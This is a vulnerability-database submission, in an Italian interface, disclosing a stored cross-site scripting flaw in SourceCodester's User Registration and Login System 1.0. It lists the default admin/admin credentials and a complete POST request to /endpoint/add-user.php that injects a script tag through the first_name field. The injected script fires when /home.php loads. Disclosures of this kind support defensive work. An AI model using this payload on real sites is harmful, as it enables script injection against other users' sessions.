user-registration-and-l User Registration and Login System 1.0 Cross-site Scripting attacksinformazioni

Titolo	https://www.sourcecodester.com/php/16890/user-registration-and-l User Registration and Login System 1.0 Cross-site Scripting attacks
Descrizione	BUG_Author: hlhyp vendors: https://www.sourcecodester.com/php/16890/user-registration-and-login-system-using-php-source-code.html username && password : admin/admin Vulnerability File: /endpoint/add-user.php ;/home.php [+] payload: contact_number=1&email=testing%40example.com&first_name=LgyxmpHT--><ScRiPt%20>alert(9221)</ScRiPt><!--&last_name=LgyxmpHT&password=u]H[ww6KrA9F.x-F&username=LgyxmpHT First: POST /endpoint/add-user.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Referer: http://127.0.0.1/ Content-Length: 164 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Host: 127.0.0.1 Connection: Keep-alive contact_number=1&email=testing%40example.com&first_name=LgyxmpHT--><ScRiPt%20>alert(9221)</ScRiPt><!--&last_name=LgyxmpHT&password=u]H[ww6KrA9F.x-F&username=LgyxmpHT Then access /home.php will alert message
Fonte	⚠️ https://github.com/qqisee/vulndis/blob/main/xss_add_user.md
Utente	hlhyp (UID 59415)
Sottomissione	01/12/2023 09:30 (3 anni fa)
Moderazione	01/12/2023 17:05 (8 hours later)
Stato	Accettato
Voce VulDB	246613 [SourceCodester User Registration and Login System 1.0 /endpoint/add-user.php first_name cross site scripting]
Punti	20

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!